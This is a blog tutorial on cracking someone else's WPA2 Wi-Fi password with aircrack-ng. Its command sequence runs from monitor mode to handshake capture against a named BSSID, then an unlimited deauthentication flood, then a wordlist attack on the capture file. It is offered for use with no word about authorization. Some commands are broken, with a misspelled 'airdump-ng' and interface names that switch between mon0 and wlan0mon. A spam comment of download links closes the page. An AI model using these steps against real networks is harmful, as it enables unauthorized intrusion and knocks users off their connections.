How To Cracking wpa2 Password using Aircrack-ng

Share it:



ASSALAM O ALAIKUM

Cracking WPA2 wifi password is not really an easy thing to do,
no you can't crack it with a click and there is no software that will give you the password without some hard work ...
don't run away still you can crack it  with few steps here ;) and we will crack it using aircrack-ng

     Requirements:


  • Kali Linux up and running. (sudo apt-get install aircrack-ng) use this command to install Aircrack-ng.
  • You need wireless network adopter which support monitoring mode (if u are running kali linux in vm ware or virtual box Otherwise U don't need wireless adopter)
       I am going to teach u step by step:

  • Open terminal type (iwconfig) this command will show you all network interfaces connected to your device.
  • If your wireless network adopter is working fine u will see interface name "wlan0" if u have more then 1 adopter connect with device then the name maybe change ;) try to figure out.
  • 'airmon-ng' is a traffic monitoring tool we use it for packet capturing and for detecting networks."wlan0" is our interface maybe your different.


    Now Start Monitoring Mode:
  • airmon-ng start wlan0  
    To Detect The Availabe Networks: 
  • airdump-ng mon0
    Start Capturing Packets of your Target Network :
  • airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0mon 
  • i.e:  airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon

   while the capturing of packets goes on, open a new terminal as root and type
   aireplay-ng -0 0 -a <bssid> mon0
   aireplay-ng = tool for deauthentication, fake authentication and other packet injections,
   -0 = number associated for deauthentication,
   0 = deauth count,
   -a = bssid) here we are trying to send a deauthentication request.
   In my case the command looks like
  • aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon

   Stop the capturing:


  • using cntrl+c and type “ls” that would bring up all the current directories and files.
  • Select the file with “.cap“extension and type the following command
  • aircrack-ng -w <full location of the word list> <name of the file>
  • aircrack-ng is a tool that helps in cracking the password
  • aircrack-ng -w /usr/share/wordlists/pass.txt packets-01.cap
   That's it for better understanding watch video below:





Share it:

Wifi Hacking

Post A Comment:

1 comments:

  1. How To Cracking Wpa2 Password Using Aircrack-Ng - Pak Anonymous Gaming World >>>>> Download Now

    >>>>> Download Full

    How To Cracking Wpa2 Password Using Aircrack-Ng - Pak Anonymous Gaming World >>>>> Download LINK

    >>>>> Download Now

    How To Cracking Wpa2 Password Using Aircrack-Ng - Pak Anonymous Gaming World >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete